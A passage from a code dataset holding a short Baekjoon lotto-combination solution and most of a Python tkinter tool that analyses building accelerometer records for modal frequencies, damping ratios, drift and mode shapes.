"attribute"}, {"api_name": "numpy.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 317, "usage_type": "attribute"}, 
{"api_name": "numpy.sum", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 336, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 351, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 356, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 356, "usage_type": "call"}]} +{"seq_id": "16403126564", "text": "from typing import List\n\n\ndef r(datas: List[int], lst: List[int], index: int):\n\n if 6 == len(lst):\n print(*lst)\n return\n\n if index == len(datas):\n return\n\n r(datas, lst+[datas[index], ], index+1)\n r(datas, lst, index+1)\n\n\nwhile True:\n line = input()\n if line == \"0\":\n break\n\n datas = list(map(int, line.split()[1:]))\n\n r(datas, [], 0)\n\n print()\n", "repo_name": "studiers/BOJ", "sub_path": "06603-lotto.py", "file_name": "06603-lotto.py", "file_ext": "py", "file_size_in_byte": 400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "34086863764", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 12 13:27:59 2022\r\n\r\n@author: PC\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom tkinter import messagebox\r\nimport pandas as pd\r\nfrom PIL import Image, ImageTk\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport zipfile\r\nimport shutil\r\nfrom Libraries import read_V2,read_version_V2,calcFdd,half_power,log_damp,calc_Drift,calc_modeshape,modeshape_interpolate,draw_maxmodeshape,draw_minmodeshape\r\nimport numpy as np\r\nimport datetime\r\n\r\np1_file = os.path.dirname(os.path.realpath(__file__))\r\n\r\n\r\nclass resultsPage(tk.Toplevel):\r\n \r\n def __init__(self, main):\r\n \r\n super().__init__()\r\n \r\n self.geometry('1050x800')\r\n self.title(\"Results\")\r\n self.resizable(True,True)\r\n \r\n self.mod_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"mods\")\r\n self.half_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"damp_half\")\r\n self.log_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"damp_log\")\r\n \r\n mods_fq = [x for x in self.mod_df]\r\n \r\n self.event_names = mods_fq[0]\r\n mods_fq = mods_fq[1::]\r\n \r\n mf_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n mf_frame.grid(row=0,column=0)\r\n \r\n mod_label = Label(mf_frame,text=\"Modal Frequencies - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n mod_label.pack()\r\n \r\n self.mod_mq = ttk.Combobox(mf_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.mod_mq[\"values\"] = mods_fq\r\n self.mod_mq.pack()\r\n \r\n self.mf_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n self.mf = 
self.mf_figure.add_subplot(111)\r\n        \r\n        self.mf.set_xlabel(\"Events\")\r\n        self.mf.set_ylabel(\"Modal Frequencies\")\r\n        self.chart_type = FigureCanvasTkAgg(self.mf_figure,mf_frame)\r\n        self.chart_type.get_tk_widget().pack(padx=10,pady=5)\r\n        \r\n\r\n        dp_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n        dp_frame.grid(row=1,column=0)\r\n        \r\n        dp_label = Label(dp_frame,text=\"Half Power - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n        dp_label.pack()\r\n        \r\n        self.mod_dr = ttk.Combobox(dp_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n        self.mod_dr[\"values\"] = mods_fq\r\n        self.mod_dr.pack()\r\n        \r\n        self.dp_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n        self.dp = self.dp_figure.add_subplot(111)\r\n        \r\n        self.dp.set_xlabel(\"Damping Ratios\")\r\n        self.dp.set_ylabel(\"Events\")\r\n        self.chart_type2 = FigureCanvasTkAgg(self.dp_figure,dp_frame)\r\n        self.chart_type2.get_tk_widget().pack(padx=10,pady=5)\r\n\r\n\r\n        lr_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n        lr_frame.grid(row=1,column=1)\r\n        \r\n        lr_label = Label(lr_frame,text=\"Logarithmic - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n        lr_label.pack()\r\n        \r\n        self.mod_lr = ttk.Combobox(lr_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n        self.mod_lr[\"values\"] = mods_fq\r\n        self.mod_lr.pack()\r\n        \r\n        self.lr_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n        self.lr = self.lr_figure.add_subplot(111)\r\n        \r\n        self.lr.set_xlabel(\"Damping Ratios\")\r\n        self.lr.set_ylabel(\"Events\")\r\n        self.chart_type3 = FigureCanvasTkAgg(self.lr_figure,lr_frame)\r\n        self.chart_type3.get_tk_widget().pack(padx=10,pady=5)\r\n        \r\n        \r\n        dr_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n        dr_frame.grid(row=0,column=1)\r\n        \r\n        dr_label = Label(dr_frame,text=\"Drift - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n        dr_label.pack()\r\n        \r\n        \r\n        self.dr_figure = plt.Figure(figsize=(13,7),dpi=60)\r\n        self.dr = self.dr_figure.add_subplot(111)\r\n        \r\n        self.dr.set_xlabel(\"Events\")\r\n        self.dr.set_ylabel(\"Drift Ratios\")\r\n        self.chart_type4 = FigureCanvasTkAgg(self.dr_figure,dr_frame)\r\n        self.chart_type4.get_tk_widget().pack(padx=10,pady=5)\r\n        \r\n        self.mod_mq.bind('<<ComboboxSelected>>', self.showMF)\r\n        self.mod_dr.bind('<<ComboboxSelected>>', self.showDR)\r\n        self.mod_lr.bind('<<ComboboxSelected>>', self.showLR)\r\n        \r\n    def showMF(self,event):\r\n        \r\n        mod = self.mod_mq.get()\r\n        \r\n\r\n        labels = [x for x in self.mod_df[self.event_names]]\r\n        labels.sort()\r\n        self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n        self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n        self.mod_df[self.event_names] = labels\r\n        \r\n        ranges = range(0,len(labels),1)\r\n        \r\n        self.mf.clear()\r\n        self.mf.set_xlabel(\"Events\")\r\n        self.mf.set_ylabel(\"Modal Frequencies\")\r\n        self.mf.plot(self.mod_df[self.event_names],self.mod_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r')\r\n        self.mf.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n        \r\n        self.chart_type.draw()\r\n        \r\n        \r\n    def showDR(self,event):\r\n        \r\n        mod = self.mod_dr.get()\r\n        labels = [x for x in self.mod_df[self.event_names]]\r\n        labels.sort()\r\n        self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n        self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n        self.mod_df[self.event_names] = labels\r\n        ranges = range(0,len(labels),1)\r\n        \r\n        self.dp.clear()\r\n        self.dp.set_xlabel(\"Events\")\r\n        self.dp.set_ylabel(\"Damping Ratios\")\r\n        
self.dp.plot(self.half_df[self.event_names],self.half_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r',mfc='orange')\r\n        self.dp.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n        \r\n        self.chart_type2.draw()\r\n        \r\n    def showLR(self,event):\r\n        \r\n        mod = self.mod_lr.get()\r\n        labels = [x for x in self.mod_df[self.event_names]]\r\n        labels.sort()\r\n        self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n        self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n        self.mod_df[self.event_names] = labels\r\n        ranges = range(0,len(labels),1)\r\n        \r\n        self.lr.clear()\r\n        self.lr.set_xlabel(\"Events\")\r\n        self.lr.set_ylabel(\"Damping Ratios\")\r\n        self.lr.plot(self.log_df[self.event_names],self.log_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r',mfc='green')\r\n        self.lr.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n        \r\n        self.chart_type3.draw() \r\n        \r\n\r\nclass showAnalysiss(tk.Toplevel):\r\n    \r\n    def __init__(self, main,data_df,fs_df,coordinate_df):\r\n        \r\n        super().__init__()\r\n        \r\n        self.data_df = data_df\r\n        self.fs_df = fs_df\r\n        self.coordinate_df = coordinate_df\r\n        \r\n        self.coordinate_df = pd.read_excel(\"sensors_df.xlsx\")\r\n        \r\n        self.geometry('1400x900')\r\n        self.title(\"Accelerations\")\r\n        self.resizable(True,True)\r\n        \r\n        fdd_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n\r\n        fdd_frame.pack(side=LEFT,anchor=\"nw\")\r\n        \r\n        self.windows_value = DoubleVar()\r\n        self.overlap_value = DoubleVar()\r\n        \r\n        \r\n        label_fdd = Label(fdd_frame,text=\"FDD Graph\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n        label_fdd.pack(anchor=\"w\")\r\n        \r\n        self.windowing = ttk.Combobox(fdd_frame,width=15,height=3,state=\"readonly\",justify=\"center\",textvariable=self.windows_value)\r\n        self.windowing[\"value\"] = [256,512,1024,2048,4096,8192,16384]\r\n        self.overlap = ttk.Combobox(fdd_frame,width=15,height=3,state=\"readonly\",justify=\"center\",textvariable=self.overlap_value)\r\n        self.overlap[\"value\"] = [0.33,0.66,1.0]\r\n        \r\n        label_fdd = Label(fdd_frame,text=\"Windowing\",font=(\"Arial\",10))\r\n        label_fdd.pack(anchor=\"w\")\r\n        \r\n        self.windowing.pack(anchor=\"w\")\r\n        \r\n        label_fdd = Label(fdd_frame,text=\"Overlap\",font=(\"Arial\",10))\r\n        label_fdd.place(x=240,y=23)\r\n        \r\n        calc_button = Button(fdd_frame,text=\"Calculate FDD\",command=self.calc_FDD,bg=\"cyan\")\r\n        \r\n        self.overlap.place(x=210,y=45)\r\n        calc_button.place(x=380,y=40)\r\n        \r\n        self.fdd_figure = plt.Figure(figsize=(7,7),dpi=70)\r\n        self.fd = self.fdd_figure.add_subplot(111)\r\n        \r\n        self.fd.set_xlabel(\"Frequency (Hz)\")\r\n        self.fd.set_ylabel(r'dB $[g^2/Hz]$')\r\n        self.chart_type = FigureCanvasTkAgg(self.fdd_figure,fdd_frame)\r\n        self.chart_type.get_tk_widget().pack(anchor=\"n\",side=RIGHT,pady=5)\r\n        \r\n        table_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n\r\n        table_frame.pack(side=LEFT,anchor=\"n\")\r\n        \r\n        table_label = Label(table_frame,text=\"Mod Table\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n        table_label.pack()\r\n        self.ttv_mod = ttk.Treeview(table_frame)\r\n        self.ttv_mod.bind(\"<Double-1>\", self.OnDoubleClick)\r\n        self.ttv_mod.pack()\r\n        \r\n        self.x_figure = plt.Figure(figsize=(4,4),dpi=70)\r\n        self.ax = self.x_figure.gca(projection='3d')\r\n        \r\n        self.chart_type4 = FigureCanvasTkAgg(self.x_figure,table_frame)\r\n        self.chart_type4.get_tk_widget().pack(padx=10,pady=5,side=LEFT,anchor=\"w\")\r\n        \r\n        \r\n        self.y_figure = plt.Figure(figsize=(4,4),dpi=70)\r\n        self.ay = self.y_figure.gca(projection='3d')\r\n        \r\n        \r\n        self.chart_type5 = 
FigureCanvasTkAgg(self.y_figure,table_frame)\r\n self.chart_type5.get_tk_widget().pack(padx=10,pady=5,side=RIGHT)\r\n \r\n \r\n aa = Label(self,text=\"Drift Table\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n aa.place(x=10,y=580)\r\n \r\n columns = [\"Floors\",\"X-Relative Disp.\",\"X-Drift\",\"Y-Relative Disp\",\"Y-Drift\"]\r\n self.ttv_drift = ttk.Treeview(self,columns=columns, show='headings')\r\n \r\n self.ttv_drift.heading('Floors', text='Floors')\r\n self.ttv_drift.heading('X-Relative Disp.', text='X-Relative Disp.')\r\n self.ttv_drift.heading('X-Drift', text='X-Drift')\r\n self.ttv_drift.heading('Y-Relative Disp', text='Y-Relative Disp')\r\n self.ttv_drift.heading('Y-Drift', text='Y-Drift')\r\n \r\n\r\n self.ttv_drift.place(x=10,y=610)\r\n \r\n \r\n def OnDoubleClick(self,event):\r\n fs = 1/self.fs_df[\"fs\"][0]\r\n item = self.ttv_mod.identify('item',event.x,event.y)\r\n values = self.ttv_mod.item(item)\r\n modfreq = values[\"values\"][0]\r\n modfreq = float(modfreq)\r\n \r\n lines = self.fd.axvline(x=modfreq, color='red', linestyle='--')\r\n \r\n mod_shapes = calc_modeshape.calcModeShape(self.data_df,[modfreq],fs=fs)\r\n \r\n max_modshape = mod_shapes[0]\r\n min_modshape = mod_shapes[1]\r\n \r\n height = 22.5\r\n z_dim = 9\r\n length = 50\r\n width = 18\r\n ch_names = self.data_df.columns.values\r\n modeshape_interpolate2 = modeshape_interpolate.modeshapeInterpolate(max_modshape,min_modshape,self.coordinate_df,height,z_dim,ch_names)\r\n \r\n X_df_max = modeshape_interpolate2[1]\r\n Y_df_max = modeshape_interpolate2[3]\r\n \r\n # Drawing modshapes\r\n \r\n modeshapefig = draw_maxmodeshape.modeshapeSensorDrawing(self,X_df_max,Y_df_max,length,width,height,z_dim,0)\r\n \r\n X_df_max = modeshape_interpolate2[0]\r\n Y_df_max = modeshape_interpolate2[2]\r\n \r\n modeshapefig = draw_minmodeshape.modeshapeSensorDrawing(self,X_df_max,Y_df_max,length,width,height,z_dim,0)\r\n \r\n self.chart_type.draw()\r\n \r\n lines.remove()\r\n \r\n def calc_FDD(self):\r\n \r\n windowing = float(self.windowing.get())\r\n overlap = float(self.overlap.get())*100\r\n fs = 1/self.fs_df[\"fs\"][0]\r\n self.fd.clear()\r\n fdd = calcFdd.calcFDD(self,self.data_df.values,fs,(fs/2)/windowing,overlap=overlap)\r\n\r\n mod_freqs = []\r\n for modfreq in fdd.values:\r\n \r\n for freq in modfreq:\r\n mod_freqs.append(float(freq))\r\n \r\n mod_freqs = list(set(mod_freqs))\r\n mod_freqs = mod_freqs[0:6]\r\n mod_freqs.sort()\r\n \r\n data = self.data_df\r\n self.mods = mod_freqs\r\n columns = self.data_df.columns\r\n \r\n windowing = int(windowing)\r\n # # Damping Ratios\r\n self.damp_half = half_power.dampHalf(data,self.mods,fs=fs,samples=windowing,overlap=overlap/100)\r\n self.damp_log = log_damp.dampLog(data,self.mods,fs=fs,samples=windowing,overlap=overlap/100,length=2000)\r\n \r\n self.modfreq_df = pd.DataFrame()\r\n \r\n damp_col = self.damp_half.columns.values\r\n \r\n for i in range(len(damp_col)):\r\n \r\n self.modfreq_df[damp_col[i]] = [self.mods[i]]\r\n \r\n indexes = self.damp_half.index\r\n columns = self.damp_half.columns\r\n \r\n\r\n trans_df = self.modfreq_df.T\r\n indexes = self.damp_half.index\r\n columns = self.damp_half.columns\r\n # self.modfreq_df = self.modfreq_df.rename(columns={0: \"Mod Freq\"})\r\n \r\n # self.damp_half = self.damp_half.T\r\n # self.damp_half = self.damp_half.rename(columns={0: \"Half-Power\"})\r\n\r\n # self.damp_log = self.damp_log.T\r\n # self.damp_log = self.damp_log.rename(columns={0: \"Log-Decrement\"})\r\n \r\n # print(self.modfreq_df)\r\n \r\n\r\n \r\n result_df = 
pd.DataFrame(data=[self.modfreq_df.iloc[0].values,self.damp_half.iloc[0].values,self.damp_log.iloc[0].values]\r\n ,index=[\"Mod Freq\",\"Half-Power\",\"Log-Decrement\"],columns=columns)\r\n \r\n result_df = result_df.T\r\n \r\n result_df = result_df.round(3)\r\n col = list(result_df.columns)\r\n self.ttv_mod[\"columns\"]=(col)\r\n \r\n for i in self.ttv_mod.get_children():\r\n self.ttv_mod.delete(i)\r\n \r\n for x in col:\r\n self.ttv_mod.column(x,width=20)\r\n self.ttv_mod.heading(x, text=x)\r\n \r\n result_df = result_df.sort_index()\r\n for index, row in result_df.iterrows():\r\n \r\n self.ttv_mod.insert(\"\",0,text=index,values=list(row))\r\n \r\n self.chart_type.draw()\r\n \r\n height = 22.5\r\n z_dim = 9\r\n drift = calc_Drift.calcDrift(self.data_df, self.coordinate_df, fs, height, z_dim)\r\n \r\n X_rel = drift[0].values\r\n Y_rel = drift[1].values\r\n X_Drift = drift[2].values\r\n Y_Drift = drift[3].values\r\n\r\n \r\n \r\n floors = drift[0].index\r\n for i in range(len(floors)):\r\n\r\n self.ttv_drift.insert('', tk.END, values=(floors[i],round(X_rel[i],2),round(X_Drift[0][i],2),round(Y_rel[i],2),round(Y_Drift[0][i],2)))\r\n \r\n \r\n \r\nclass showAccData(tk.Toplevel):\r\n \r\n def __init__(self, main,station_net,data_file,data_df,fs,time,fs_df,coordinate_df):\r\n \r\n super().__init__()\r\n \r\n self.geometry('1100x400')\r\n self.title(\"Accelerations\")\r\n self.resizable(False,False)\r\n \r\n self.data_df = data_df\r\n self.fs = fs\r\n self.fs_df = fs_df\r\n self.time = time\r\n self.coordinate_df = coordinate_df\r\n \r\n # List X\r\n self.x_list = []\r\n self.y_list = []\r\n self.z_list = []\r\n self.n_list = []\r\n self.direc_list = []\r\n \r\n self.station_net = station_net\r\n self.data_file = data_file\r\n \r\n data_label = Label(self,text=\"Data Files\")\r\n data_label.pack(anchor=\"nw\",padx=5)\r\n \r\n data_folder = p1_file + \"/Data\"\r\n data_files = os.listdir(data_folder)\r\n \r\n self.data_combobox = ttk.Combobox(self,width=12,state=\"readonly\",justify=\"center\", postcommand = self.updateList)\r\n self.data_combobox[\"values\"] = data_files\r\n self.data_combobox.pack(anchor=\"nw\",padx=5,pady=5)\r\n \r\n self.Lb1 = Listbox(self)\r\n self.Lb1.pack(side=LEFT,anchor=\"nw\",padx=5,pady=10)\r\n \r\n show_data = Button(self,text=\"Show Value\",bg=\"#66CDAA\",width=15,command=self.showData)\r\n show_data.place(x=10,y=240)\r\n \r\n channel_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n channel_frame.place(x=150,y=23)\r\n \r\n channel_name = Label(channel_frame,text=\"Channel Name\",font=(\"Arial\",12,\"bold\"))\r\n channel_name.pack()\r\n \r\n self.channel_name = ttk.Combobox(channel_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.channel_name.pack(pady=5)\r\n \r\n \r\n self.x_figure = plt.Figure(figsize=(6,4),dpi=70)\r\n self.ax = self.x_figure.add_subplot(111)\r\n \r\n self.ax.set_xlabel(\"Time (s)\")\r\n self.ax.set_ylabel(\"Acceleration (cm/s)\")\r\n self.chart_type = FigureCanvasTkAgg(self.x_figure,channel_frame)\r\n self.chart_type.get_tk_widget().pack(padx=10,pady=5)\r\n \r\n sensor_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n sensor_frame.place(x=610,y=23)\r\n \r\n channel_name = Label(sensor_frame,text=\"Sensor Placement\",font=(\"Arial\",12,\"bold\"))\r\n channel_name.pack()\r\n \r\n \r\n X_name = Label(sensor_frame,text=\"X\",font=(\"Arial\",10))\r\n X_name.pack()\r\n \r\n self.X_direction = Entry(sensor_frame,justify=\"center\")\r\n self.X_direction.pack(pady=5)\r\n \r\n X_name = 
Label(sensor_frame,text=\"Y\",font=(\"Arial\",10))\r\n        X_name.pack()\r\n        \r\n        self.Y_direction = Entry(sensor_frame,justify=\"center\")\r\n        self.Y_direction.pack(pady=5)\r\n        \r\n        X_name = Label(sensor_frame,text=\"Z\",font=(\"Arial\",10))\r\n        X_name.pack()\r\n        \r\n        self.Z_direction = Entry(sensor_frame,justify=\"center\")\r\n        self.Z_direction.pack(pady=5)\r\n        \r\n        X_name = Label(sensor_frame,text=\"Direction\",font=(\"Arial\",10))\r\n        X_name.pack()\r\n        \r\n        self.direction = ttk.Combobox(sensor_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n        self.direction[\"values\"] = [\"X\",\"Y\",\"Z\"]\r\n        self.direction.pack(pady=5)\r\n        \r\n        place = Button(sensor_frame,text=\"Place Sensor\",command=self.placeSensor)\r\n        place.pack(pady=5)\r\n        \r\n        model_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n        model_frame.place(x=790,y=23)\r\n        \r\n        channel_name = Label(model_frame,text=\"Model\",font=(\"Arial\",12,\"bold\"))\r\n        channel_name.pack()\r\n        \r\n\r\n        self.model = plt.Figure(figsize=(4,4),dpi=70)\r\n        self.ad = self.model.gca(projection='3d')\r\n        \r\n        height = 22.5\r\n        width = 18\r\n        length = 50\r\n        \r\n        center = [length/2 , width/2, height/2]\r\n        \r\n        ox, oy, oz = center\r\n        l, w, h = [length,width,height]\r\n        \r\n        x = np.linspace(ox-l/2,ox+l/2,num=3) \r\n        y = np.linspace(oy-w/2,oy+w/2,num=3)\r\n        z = np.linspace(oz-h/2,oz+h/2,num=10)\r\n        x1, z1 = np.meshgrid(x, z)\r\n        y11 = np.ones_like(x1)*(oy-w/2)\r\n        y12 = np.ones_like(x1)*(oy+w/2)\r\n        x2, y2 = np.meshgrid(x, y)\r\n        z21 = np.ones_like(x2)*(oz-h/2)\r\n        z22 = np.ones_like(x2)*(oz+h/2)\r\n        y3, z3 = np.meshgrid(y, z)\r\n        x31 = np.ones_like(y3)*(ox-l/2)\r\n        x32 = np.ones_like(y3)*(ox+l/2)\r\n        \r\n        # outside surface\r\n        self.ad.plot_wireframe(x1, y11, z1, color='gray') # front\r\n        # inside surface\r\n        self.ad.plot_wireframe(x1, y12, z1, color='gray') # behind\r\n        # bottom surface\r\n        self.ad.plot_wireframe(x2, y2, z21, color='gray') # below\r\n        # upper surface\r\n        self.ad.plot_wireframe(x2, y2, z22, color='gray') # top\r\n        # left surface\r\n        self.ad.plot_wireframe(x31, y3, z3, color='gray') # left\r\n        # right surface\r\n        self.ad.plot_wireframe(x32, y3, z3, color='gray') # right\r\n        self.ad.set_xlabel('X')\r\n        self.ad.set_ylabel('Y')\r\n        self.ad.set_zlabel('Z')\r\n\r\n        self.chart_type2 = FigureCanvasTkAgg(self.model,model_frame)\r\n        self.chart_type2.get_tk_widget().pack(anchor=\"e\",side=TOP)\r\n        \r\n        self.channel_name.bind('<<ComboboxSelected>>', self.showPlot)\r\n        \r\n        \r\n        set_sensors = Button(model_frame,text=\"Set Channels\",command=self.setchannels)\r\n        \r\n        set_sensors.pack(pady=10)\r\n        \r\n    def setchannels(self):\r\n        \r\n        self.coordinate_df[\"X\"] = self.x_list\r\n        self.coordinate_df[\"Y\"] = self.y_list\r\n        self.coordinate_df[\"Z\"] = self.z_list\r\n        self.coordinate_df[\"name\"] = self.n_list\r\n        self.coordinate_df[\"directions\"] = self.direc_list\r\n        \r\n    def updateList(self):\r\n        \r\n        data_folder = p1_file + \"/Data/\"+ self.data_combobox.get() + \"/\"\r\n        data_files = os.listdir(data_folder)\r\n        \r\n        self.Lb1.delete(0,END)\r\n        for i in range(len(data_files)):\r\n            \r\n            self.Lb1.insert(i, data_files[i])\r\n        \r\n        \r\n    def showData(self):\r\n        \r\n        # self.data_df = pd.DataFrame()\r\n        # self.fs = float()\r\n        # self.time = pd.DataFrame()\r\n        \r\n        self.x_list = []\r\n        self.y_list = []\r\n        self.z_list = []\r\n        self.direc_list = []\r\n        \r\n        for i in self.Lb1.curselection():\r\n\r\n            data_folder = p1_file + \"/Data/\"+ self.data_combobox.get() + \"/\" + self.Lb1.get(i)\r\n            data_files = os.listdir(data_folder)\r\n            \r\n            files = [c for c in data_files 
if c[-3::] == \".V2\"]\r\n \r\n if len(files) > 1:\r\n \r\n data = read_V2.v2toData(files, data_folder)\r\n data_df = data[0]\r\n \r\n self.fs = data[1]\r\n self.time[\"time\"] = data[2]\r\n \r\n self.channel_name[\"values\"] = list(data_df.columns)\r\n \r\n elif len(files) == 1:\r\n \r\n read_version_V2.versionV2(files)\r\n \r\n for i in data_df:\r\n \r\n self.data_df[i] = data_df[i]\r\n \r\n\r\n self.fs_df[\"fs\"] = [self.fs]\r\n\r\n \r\n def showPlot(self,event):\r\n\r\n self.ax.clear()\r\n self.ax.plot(self.time.values,self.data_df[\"{0}\".format(self.channel_name.get())])\r\n self.ax.set_xlabel(\"Time (s)\")\r\n self.ax.set_ylabel(\"Acceleration (cm/s)\")\r\n self.chart_type.draw()\r\n \r\n \r\n def placeSensor(self):\r\n \r\n x = float(self.X_direction.get())\r\n y = float(self.Y_direction.get())\r\n z = float(self.Z_direction.get())\r\n name = self.channel_name.get()\r\n direct = self.direction.get()\r\n \r\n self.x_list.append(x)\r\n self.y_list.append(y)\r\n self.z_list.append(z)\r\n self.n_list.append(name)\r\n self.direc_list.append(direct)\r\n \r\n place_fig = self.ad.scatter(self.x_list, self.y_list, self.z_list, color='red',lw=6)\r\n \r\n\r\n \r\n self.chart_type2.draw()\r\n \r\nclass mainApplication(tk.Tk):\r\n \r\n def __init__(self):\r\n \r\n super().__init__()\r\n \r\n self.geometry('350x330')\r\n self.title(\"AFU-PY\")\r\n self.resizable(False,False)\r\n \r\n # Data Variable\r\n \r\n self.data_df = pd.DataFrame()\r\n self.fs_df = pd.DataFrame()\r\n self.time = pd.DataFrame()\r\n self.coordinate_df = pd.DataFrame()\r\n \r\n self.station_net = str()\r\n \r\n p1_file = os.path.dirname(os.path.realpath(__file__))\r\n self.files = os.listdir(p1_file)\r\n download_check = [s for s in self.files if \"Download\" in s]\r\n data_check = [s for s in self.files if \"Data\" in s]\r\n self.p1_file = p1_file\r\n \r\n if download_check == []:\r\n \r\n self.download_file = os.mkdir(p1_file+\"/Download\")\r\n self.download_file = p1_file+\"/Download\"\r\n else:\r\n \r\n self.download_file = p1_file+\"/Download\"\r\n \r\n if data_check == 